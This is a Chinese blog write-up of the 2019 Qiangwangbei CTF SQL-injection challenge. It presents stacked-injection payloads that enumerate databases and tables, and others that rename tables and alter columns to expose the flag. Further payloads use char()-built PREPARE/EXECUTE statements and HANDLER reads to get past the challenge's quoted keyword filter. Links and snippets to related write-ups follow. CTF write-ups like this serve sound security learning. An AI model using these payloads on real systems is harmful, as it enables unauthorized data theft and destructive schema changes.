[强网杯 2019]随便注

最新推荐文章于 2024-07-22 14:36:59 发布
最新推荐文章于 2024-07-22 14:36:59 发布
阅读量199 收藏
点赞数
分类专栏: Buu-Web 文章标签: mysql WriteUp CTF sql注入 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/129078184
版权

[强网杯 2019]随便注

在这里插入图片描述

  • 单引号闭合
  • 然后尝试联合注入1’ union select 1,databases()# 返回过滤提示。
    • return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
      在这里插入图片描述

第一种方式:堆叠注入

1';show databases#      看数据库

在这里插入图片描述

1';show tables#看表
在这里插入图片描述

1';show columns from words;# 或 1';desc words;#看表words的字段
在这里插入图片描述

1’;show columns from 1919810931114514# 或1’;desc 1919810931114514;# 看表1919810931114514的字段。

![在这里插入图片描述](https://img-blog.csdnimg.cn/5c32283098604d9ca2e7fff354ed7f6a.png)

* 到这里,就发现,没办法继续下去。
* 可以看见,表`words`有两列,列名为 “id” 和 “data” 而表`1919810931114514`只有一列 “flag” 。
* 可以发现,它是通过 “id” 来索引的,通过输入1时的回显和展示表`words`的内容可以判断。
* 没有过滤 `alter` 和 `rename`。可以修改表名和列名。

### 思路

1. 我们把表`words`改名为其它
2. 然后把表`1919810931114514`改名为`words`
3. 再在表`1919810931114514`插入一列`id`
4. 当我们再次查询时,查询的就是`flag` 所在的表,且可以被展示出来

### payload

  • 1’;rename table words to words1;rename table 1919810931114514 to words;alter table words change flag id varchar(100) character set utf8 collate utf8_general_ci not NULL;#

  • rename table words to words1; 修改表 words 改名为其它,

  • rename table 1919810931114514 to words;修改表 1919810931114514 改名为 words

  • alter table words change flag id varchar(100) character set utf8 collate utf8_general_ci not NULL;修改列 flag 改名为 id

  • 或者可以 alter table words add id int unsigned not Null auto_increment primary key;在表 1919810931114514 插入一列 id

  • 然后再 1’ or 1=1# ,展示flag


## 第二种方式:sql语句预处理
  • 在sql语句中,@ 用于定义变量。
  • concat(),函数用于字符串拼接。
  • char(),将ASCII码转换为对应的字符。
  • 定义预处理语句 PREPARE stmt_name FROM preparable_stmt;
  • 执行预处理语句 EXECUTE stmt_name [USING @var_name [, @var_name] …];
  • 删除(释放)定义 {DEALLOCATE | DROP} PREPARE stmt_name;

### payload

  • 1’;SET @sql = concat(char(115,101,108,101,99,116), " * from 1919810931114514"); PREPARE yuchuli from @sql; EXECUTE yuchuli;

    • 因为select被过滤,用char(115,101,108,101,99,116)生成select,也可以用拼接生成select。
    • 然后用concat()拼接成一句完整的sql语句。
    • 先定义了一个变量sql,然后将变量sql定义为预处理语句,然后再执行。

## 第三种方式:通过handler读取数据

### payload

1’;handler 1919810931114514 open;handler 1919810931114514 read first#


* mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
  • HANDLER tbl_name OPEN [ [AS] alias]
  • HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…)[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name READ { FIRST | NEXT }[ WHERE where_condition ] [LIMIT … ]
  • HANDLER tbl_name CLOSE
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
sql注入之联合查询(Mysql
华丽的贵族
09-05 1237
联合入 - 测试网站 phpstudy搭建的mysql网站 http://localhost/pentest/article.php?id=1 - 入步骤 1.判断是否存在入 输入and 1=1 未报错 输入and 1=2 报错 2.获取字段的总数: order by +数字 数字从1到4时4报错,所以网站字段为3 3.进行连接查询 http://localhost/pentest...
[HCTF 2018]WarmUp
m0sway的博客
02-12 207
Buu Web 题目 [HCTF 2018]WarmUp WriteUp
ciscn_2019_es_2
m0sway的博客
11-22 2292
ciscn_2019_es_2 使用checksec查看: 只开启了栈不可执行,放进IDA中查看: 主函数中直接给了vul() 函数,跟进去查看: 程序读取了两次数据,都是用变量s接收,但溢出所需的输入空间不够 so…空间不够,可以考虑使用栈迁移的方式: 两次s变量使用的都是同一空间,可以使用第一次read去泄露出ebp的地址,接着利用第二次read在s变量处写入ROP,在ret时,进行栈迁移,迁移到s处。 from pwn import * #start r = remote("node4.bu
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 757
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
强网杯2019 随便
BlueDoorZz的博客
07-11 390
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
【BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4805
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
[CTF]强网杯2019随便
凉水的博客
10-16 309
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
强网杯 2019 随便
Misaka10046的博客
07-05 240
首先尝试直接去入,发现好像并没有什么用 尝试使用union,preg_match() 函数可以根据正则表达式对字符串进行搜索匹配,发现全被禁了,所以排除union入 使用show,发现可以查看表名 使用desc指令分别去查看这两个表结构的详细信息,这里1919810931114514这个表名必须要使用括起来。 因为发现这里过滤了很多函数,因此考虑怎么去绕过。 这里采用了预处理的语句。先把 select * from ` 1919810931114514 `,通过16进制编码变成一串数字
(转载)强网杯2019 随便
yingyugo的博客
11-24 211
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL注入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
测试开发面试题---MySQL
最新发布
m0_53302824的博客
07-22 609
索引是数据库管理系统中用于提高数据检索速度的数据结构,它可以帮助快速定位数据不需要扫描全表。提高查询速度;唯一性约束,确保数据不会重复;辅助排序和分组;减少磁盘IO。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 690
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 440
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
mysql、oracle、db2数据库连接参数
卿本佳人的博客
07-18 336
mysql、oracle、db2数据库连接参数 参数/数据库 driver url Mysql com.mysql.jdbc.Driver 或 com.mysql.cj.jdbc.Driver jdbc:mysql://localhost:3306/数据库名 Oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl //orcl为数据库SID DB2 com.ibm.db2.jcc.D
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值